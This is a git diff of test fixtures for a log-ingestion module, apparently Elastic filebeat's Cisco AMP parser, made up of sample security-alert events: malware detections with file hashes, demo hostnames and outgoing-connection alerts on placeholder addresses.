-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json index 7cd87985c4a6..c26ba6d92862 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json @@ -420,119 +420,63 @@ ] }, { - "@timestamp": "2021-01-15T10:32:58.000Z", - "cisco.amp.cloud_ioc.description": "A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.", - "cisco.amp.cloud_ioc.short_description": "W32.PossibleNamedPipeImpersonation.ioc", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "27:85:29:21:67:49" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.event_type_id": 1107296274, - "cisco.amp.file.disposition": "Clean", - "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006657", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "27:85:29:21:67:49" - ], - "cisco.amp.timestamp_nanoseconds": 322000000, - "event.action": "Cloud IOC", - "event.category": [ - "file" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 978000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 1476910664322001000, + "event.id": 6180341055704007000, "event.kind": "alert", "event.module": "cisco", "event.severity": 3, - "event.start": "2021-01-15T10:32:58.000Z", - "file.hash.sha256": "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2", - "file.name": "cmd.exe", - "file.path": "/C:/WINDOWS/system32/cmd.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Command_Line_Arguments_Meterpreter", - "host.name": "Demo_Command_Line_Arguments_Meterpreter", - "input.type": "log", - "log.offset": 25799, - "process.hash.sha256": "69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9", - "related.hash": [ - "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" - ], - "related.hosts": [ - "Demo_Command_Line_Arguments_Meterpreter" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:27:39.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671385032556606", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 25000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533671385032557000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 27431, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 18534, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], @@ -540,64 +484,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55805, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:27:38.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671380737589308", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006661", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 605000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 947000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533671380737589000, + "event.id": 6180341055704007000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 30074, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 19987, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], @@ -605,66 +556,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55809, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:26:38.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671123039551547", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006660", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 81000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 931000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533671123039551000, + "event.id": 6180341055704007000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 31393, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 21440, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], @@ -672,3680 +628,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55808, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:26:37.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671118744584249", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006659", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 666000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533671118744584000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 34036, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:25:37.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533670861046546488", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 293000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533670861046546000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 35355, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:25:36.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533670856751579190", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 880000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533670856751579000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 38000, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:24:58.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.event_type_id": 1107296258, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 329000000, - "event.action": "Multiple Infected Files", - "event.category": [ - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 1489955900329000200, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 3, - "event.start": "2021-01-15T10:24:58.000Z", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "input.type": "log", - "log.offset": 39319, - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:23:01.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533670191031648309", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 947000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533670191031648000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 40618, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:22:29.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.B1380FD95B-100.SBX.TG", - "cisco.amp.event_type_id": 1107296272, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 0, - "event.action": "Executed malware", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 15212386047828, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 3, - "event.start": "2021-01-15T10:22:29.000Z", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "file:///C%3A/ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "input.type": "log", - "log.offset": 44582, - "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:22:00.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669929038643250", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 973000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669929038643000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 45938, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:21:00.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669671340605487", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 333000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669671340605000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 49902, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - 